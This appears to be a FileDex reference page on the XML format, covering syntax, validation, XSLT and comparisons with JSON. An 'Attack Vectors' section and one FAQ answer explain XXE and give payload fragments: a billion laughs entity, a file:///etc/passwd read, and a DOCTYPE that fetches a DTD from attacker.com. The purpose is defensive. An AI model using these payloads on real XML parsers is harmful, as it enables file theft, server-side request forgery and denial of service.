Extensible Markup Language
XML encodes structured data as nested elements with attributes in human-readable, machine-parseable text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), SOAP services, configuration files, and data interchange across enterprise systems.
Markup format. XML transformation requires XSLT or schema-specific processing.
Common questions
What is the difference between well-formed and valid XML?
Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping. Valid XML is well-formed AND conforms to a schema (XSD, DTD, or RELAX NG) that defines allowed elements, attributes, and data types. A document can be well-formed but not valid.
Is XML still used or has JSON replaced it?
XML remains dominant in enterprise systems, regulated industries (healthcare HL7, finance FpML/XBRL), document formats (DOCX, SVG, RSS), and SOAP web services. JSON replaced XML primarily for REST APIs and browser-side data exchange. Both formats are actively used for different purposes.
What is an XXE attack and how do I prevent it?
XXE (XML External Entity) injection exploits the DOCTYPE entity declaration to read local files, trigger SSRF requests, or cause denial of service via entity expansion. Prevent it by disabling external entity resolution in your XML parser. In Python lxml: etree.XMLParser(resolve_entities=False). In Java: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true).
Why does my XML parser reject characters like tabs or null bytes?
XML 1.0 forbids most ASCII control characters (0x00-0x08, 0x0B, 0x0C, 0x0E-0x1F) in all contexts, including CDATA sections. Remove or replace these bytes before parsing. XML 1.1 relaxes this restriction but is rarely used.
What makes .XML special
What is an XML file?
XML (Extensible Markup Language) is a markup language designed for storing and transporting structured data. The W3C published the first XML specification in 1998 as a simplified, human-readable alternative to SGML. Unlike HTML, XML has no predefined tags — developers define their own element names to match their data domain. This extensibility made XML the foundation for dozens of specialized formats still in use today.
Continue reading — full technical deep dive
XML is both human-readable and machine-parseable, making it suitable for configuration files, data exchange protocols, document formats, and web services. While JSON has replaced XML for many web API use cases, XML remains dominant in enterprise systems, document formats (DOCX, XLSX, SVG), and regulated industries.
How to open XML files
- Any web browser — Built-in XML viewer with collapsible tree
- VS Code (Windows, macOS, Linux) — Syntax highlighting, formatting, XML Schema validation
- Notepad++ (Windows) — XML tree view with plugin
- XMLSpy (Windows) — Professional XML editor with visual designers
- IntelliJ IDEA / WebStorm — IDE-level XML support
Technical specifications
| Property | Value |
|---|---|
| Standard | W3C Recommendation (1998, XML 1.0; 2004, XML 1.1) |
| Encoding | UTF-8, UTF-16 (required); others declared in prolog |
| Validation | DTD, XSD (XML Schema), RELAX NG |
| Transformation | XSLT stylesheets transform XML to HTML, PDF, other XML |
| Querying | XPath expressions, XQuery language |
| MIME type | application/xml or text/xml |
Common use cases
- Configuration files:
web.config(ASP.NET),pom.xml(Maven),AndroidManifest.xml - Data exchange: SOAP web services, EDI, financial messaging (FIX, FpML)
- Document formats: DOCX, XLSX, PPTX, and ODT are ZIP archives containing XML files
- Vector graphics: SVG (Scalable Vector Graphics) is XML
- Syndication: RSS and Atom feeds are XML
- Sitemaps:
sitemap.xmlfiles for search engine indexing
XML document structure
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
<product id="101">
<name>Widget A</name>
<price currency="USD">29.99</price>
<inStock>true</inStock>
</product>
</catalog>
The optional XML declaration (<?xml ... ?>) appears first. Elements must be properly nested and closed. Attributes appear inside opening tags. XML is case-sensitive (<Name> and <name> are different elements).
XML vs JSON
| Feature | XML | JSON |
|---|---|---|
| Comments | ✅ <!-- comment --> |
❌ |
| Attributes | ✅ Key-value on elements | ❌ |
| Namespaces | ✅ (xmlns:) |
❌ |
| Schema validation | ✅ XSD, DTD | ✅ JSON Schema |
| Verbosity | More verbose | More concise |
| Browser parsing | Built-in DOMParser |
Built-in JSON.parse |
Validation with XML Schema (XSD)
XSD files define which elements, attributes, and data types are allowed in an XML document. Enterprise systems use XSD to validate incoming data before processing. An XML document is well-formed if it follows XML syntax rules, and valid if it conforms to its associated schema.
XSLT transformations
XSLT (XSL Transformations) stylesheets transform XML into other formats — HTML for display, different XML vocabularies for system integration, or plain text for reporting. XSLT is a declarative language that matches XML nodes with templates and outputs the transformed result. It remains widely used in publishing workflows and legacy enterprise integration.
.XML compared to alternatives
| Formats | Criteria | Winner |
|---|---|---|
| .XML vs .JSON | Verbosity JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. | JSON wins |
| .XML vs .JSON | Schema validation XSD provides typed validation with inheritance, complex type definitions, and namespace-aware constraints. JSON Schema is capable but less mature for multi-namespace document validation. | XML wins |
| .XML vs .JSON | Comment support XML supports inline comments (<!-- ... -->). JSON has no comment syntax per RFC 8259. | XML wins |
| .XML vs .YAML | Enterprise adoption XML dominates regulated industries (finance, healthcare, government) with established standards like HL7, FpML, and XBRL. YAML is concentrated in DevOps and cloud-native tooling. | XML wins |
Technical reference
- MIME Type
application/xml- Developer
- World Wide Web Consortium (W3C)
- Year Introduced
- 1998
- Open Standard
- Yes — View specification
Binary Structure
XML is a text format, not binary. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or inline entity definitions. The document body consists of a single root element containing nested child elements. Elements are delimited by start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements may carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding; UTF-16 is also natively supported. Files may start with a UTF-8 BOM (EF BB BF) before the XML declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. Validation against a schema (XSD, DTD, RELAX NG) enforces structural and type constraints beyond well-formedness.
Attack Vectors
- XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers
- Billion laughs attack — exponentially expanding entity definitions (<!ENTITY x10 '&x9;&x9;&x9;...') consume gigabytes of RAM from a few kilobytes of XML, causing denial of service
- SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery
- XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and data extraction from XML datastores
Mitigation: FileDex processes XML files entirely in the browser. No external entity resolution, no DTD fetching, no server-side parsing. The browser's DOMParser runs in a sandboxed context with no filesystem or network access from parsed entities.